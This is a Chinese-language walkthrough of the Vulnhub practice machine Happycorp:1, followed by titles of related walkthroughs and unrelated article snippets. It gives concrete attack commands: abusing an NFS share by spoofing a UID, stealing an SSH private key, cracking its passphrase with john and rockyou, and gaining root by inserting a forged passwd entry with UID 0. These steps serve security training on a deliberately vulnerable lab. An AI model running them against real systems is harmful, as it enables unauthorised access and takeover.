Happycorp:1 Vulnhub Walkthrough
靶机链接:
https://www.vulnhub.com/entry/happycorp-1,296/
网络主机扫描:::
主机端口扫描:
NFS文件系统,尝试挂载试试
mount -t nfs 10.10.202.135:/home/karl /mnt
提示没权限打开。这里暂时放一放,看看HTTP方面,有个admin.php后台能不能上传,拿shell
web页面收集用户信息:
heather 提示密码错误
carolyn 账户不存在
rodney 账户不存在
jennifer 账户不存在
存在账户枚举,这里进行爆破top 500 weak password 没成功,放弃
尝试post username SQL注入,失败
继续看看NFS如何能读取到.SSH文件夹下的内容
尝试看下UID,我们能否创建UID相同的用户去读取文件呢
╰─ groupadd --gid 1001 test
╰─ useradd --uid 1001 --group test pentest
获取到了秘钥,复制下来,保存成文件,尝试使用用户karl用户登录,结果。。。。
这秘钥密码是啥,先爆破试试,工具 ssh2john.py
https://github.com/koboi137/john
python ssh2john.py /root/key.txt > /root/sshkey_login
╰─ john --wordlist=/usr/share/wordlists/rockyou.txt sshkey_login
成功登录
接下来就是进行提权操作,不是标准的shell,这里重新连接,指定shell
╰─ ssh -i key.txt karl@10.10.202.135 -t "/bin/sh"
find / -perm -u=s -type f 2>/dev/null
这里的思路就是复制passwd文件,复制到NFS文件共享目录,然后增加明文密码权限,然后复制回去替换,切换用户,获取root权限
openssl passwd -1 -salt hack404 pass123
$1$hack404$auqhHGf8QPcNJkxkSEm1O0
hack404:$1$hack404$auqhHGf8QPcNJkxkSEm1O0:0:0:root:/root:/bin/bash
登录成功去看下amdin.php文件的密码到底是什么玩意
登录试试
感觉有包含漏洞
OVER !!!
Happycorp:1 Vulnhub Walkthrough的更多相关文章
- HA Joker Vulnhub Walkthrough
下载地址: https://www.vulnhub.com/entry/ha-joker,379/ 主机扫描: ╰─ nmap -p- -sV -oA scan 10.10.202.132Starti ...
- HA: ISRO Vulnhub Walkthrough
下载地址: https://www.vulnhub.com/entry/ha-isro,376/ 主机扫描: ╰─ nmap -p- -sV -oA scan 10.10.202.131Startin ...
- LAMPSecurity: CTF6 Vulnhub Walkthrough
镜像下载地址: https://www.vulnhub.com/entry/lampsecurity-ctf6,85/ 主机扫描: ╰─ nmap -p- -sV -oA scan 10.10.202 ...
- Hacker Fest: 2019 Vulnhub Walkthrough
靶机地址: https://www.vulnhub.com/entry/hacker-fest-2019,378/ 主机扫描: FTP尝试匿名登录 应该是WordPress的站点 进行目录扫描: py ...
- DC8: Vulnhub Walkthrough
镜像下载链接: https://www.vulnhub.com/entry/dc-8,367/#download 主机扫描: http://10.10.202.131/?nid=2%27 http:/ ...
- HA: Infinity Stones Vulnhub Walkthrough
下载地址: https://www.vulnhub.com/entry/ha-infinity-stones,366/ 主机扫描: 目录枚举 我们按照密码规则生成字典:gam,%%@@2012 cru ...
- Sunset: Nightfall Vulnhub Walkthrough
靶机链接: https://www.vulnhub.com/entry/sunset-nightfall,355/ 主机扫描: ╰─ nmap -p- -A 10.10.202.162Starting ...
- Dc:7 Vulnhub Walkthrough
靶机下载地址: https://www.vulnhub.com/entry/dc-7,356/ 主机扫描: http://10.10.202.161/ Google搜索下: SSH 登录 以上分析得出 ...
- AI: Web: 2 Vulnhub Walkthrough
靶机下载链接: https://www.vulnhub.com/entry/ai-web-2,357 主机端口扫描: 尝试SQL注入,未发现有注入漏洞,就注册创建于一账户 http://10.10.2 ...
随机推荐
- 深入NodeJS模块os - 与操作系统“打交道”
读了 os 模块的文档,研究了几个有意思的问题:
- golang判断目录项中是目录还是文件。
package main import ( "fmt" "os") func main() { //目录的操作 fmt.Println("请输入文件目 ...
- ios---CoreLocation框架实现定位功能
CoreLocation框架实现定位功能(iOS8.0之后) // // ViewController.m // 定位 // // Created by admin on 2017/9/20. // ...
- 论文翻译:Mastering the Game of Go without Human Knowledge (第一部分)
长久以来,人工智能的一个目标是在那些具有挑战性的领域实现超过人类表现的算法.最近,AlphaGo成为了在围棋上第一个打败了世界冠军的程序.在AlphaGo中,使用深度神经网络来进行树搜索,评估位置,和 ...
- cmd 重定向
关于cmd 命令的重定向输出 2>&1 mycommand >mylog.txt 2>&1 应该是最经典的用法了. 命令的结果可以通过" %> &qu ...
- 《Android Studio实战 快速、高效地构建Android应用》--三、重构代码
要成为高效的Android程序员,需要头脑灵活,能够在开发.调试和测试的过程中重构代码,重构代码最大的风险是可能会引入意外的错误,Android Studio通过分析某些具有危险性的重构操作来降低风险 ...
- Codeforces_711_A
http://codeforces.com/problemset/problem/711/A 忙了一天没做题,做到水题,我这水平也只能做水题了= = ! #include<iostream> ...
- 一台电脑上配置多个git的ssh key
前几天公司的代码库全部迁移到了阿里云上,在配置git的ssh key的时候遇到了一个问题,那就是自己的密钥在添加时提示已经存在,原来是自己的个人账号上已经添加过这个密钥了,公司分配的账号就不能再添加这 ...
- mongodb 常用操作命令
1.关闭mongodbuse admindb.shutdownServer() 2.报错 not master and slaveok=falsers.slaveOk(); 3.查看集群副本的状态rs ...
- Golang调用Dll案例
Golang调用Dll案例 前言 在家办公已经两个多星期了,目前最大的困难就是网络很差.独自一个人用golang开发调用dll的驱动程序.本来就是半桶水的我,还在为等待打开一个页面而磨平了耐心.本想依 ...